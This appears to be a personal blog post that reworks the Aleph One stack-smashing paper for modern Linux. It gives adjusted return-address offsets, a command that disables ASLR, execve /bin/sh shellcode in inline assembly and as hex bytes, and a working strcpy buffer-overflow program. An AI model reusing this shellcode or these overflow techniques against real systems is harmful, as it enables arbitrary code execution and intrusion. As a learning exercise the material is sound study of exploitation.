For example 3 in Aleph One's Smashing the Stack for Fun and Profit paper, the offset values in the following code didn't work on my Kali linux 2025.2 system. I couldn't get it to jump beyond x = 1; assignment.
ret = buffer1 + 12;
(*ret) += 8;
Below is the working piece of code which worked on both the Kali 2025.2 and ubuntu 10.04 which was compiled as below and I disabled address space randomization.
gcc -o out example3_bof_alphone.c -ggdb -m32
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
The following piece of code with the offsets of 13, 8 worked on both systems.
#include
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)(buffer1 + 13);
(*ret) += 8;
}
int main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n", x);
}
For shellcodeasm.c the following formatting helped to get it working;
void main(){
__asm__(
"jmp jmp_here\n\t"
"call_here:\n\t"
"popl %esi\n\t"
"movl %esi,0x8(%esi)\n\t"
"movb $0x0,0x7(%esi)\n\t"
"movl $0x0,0xc(%esi)\n\t"
"movl $0xb,%eax\n\t"
"movl %esi,%ebx\n\t"
"leal 0x8(%esi),%ecx\n\t"
"leal 0xc(%esi),%edx\n\t"
"int $0x80\n\t"
"movl $0x1, %eax\n\t"
"movl $0x0, %ebx\n\t"
"int $0x80\n\t"
"jmp_here:\n\t"
"call call_here\n\t"
".string \"/bin/sh\"\n\t");
}
We have the following code testsc.c, which runs well on ubuntu 10.04.
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5d\xc3";
int main(){
int * ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
The following worked for shellcodeasm2.c.
int main(){
__asm__(
"jmp before_call\n\t"
"before_pop:\n\t"
"popl %esi\n\t"
"movl %esi,0x8(%esi)\n\t"
"xorl %eax,%eax\n\t"
"movb %eax,0x7(%esi)\n\t"
"movl %eax,0xc(%esi)\n\t"
"movb $0xb,%al\n\t"
"movl %esi,%ebx\n\t"
"leal 0x8(%esi),%ecx\n\t"
"leal 0xc(%esi),%edx\n\t"
"int $0x80\n\t"
"xorl %ebx,%ebx\n\t"
"movl %ebx,%eax\n\t"
"inc %eax\n\t"
"int $0x80\n\t"
"before_call:\n\t"
"call before_pop\n\t"
".string \"/bin/sh\"\n\t"
);
}
Belows is the working piece of code for testsc2.c.
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x4d\xc3";
int main(){
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
I had to increase the large_string array size for the RET to be overwritten as shown below.
#include
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[136];
int main(){
char buffer[96];
int i;
long * long_ptr = (long *) large_string;
for (i=0; i<34; i++)
*(long_ptr + i) = (int) buffer;
for (i=0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer, large_string);
}
Contact Me: jithesh82 AT G mail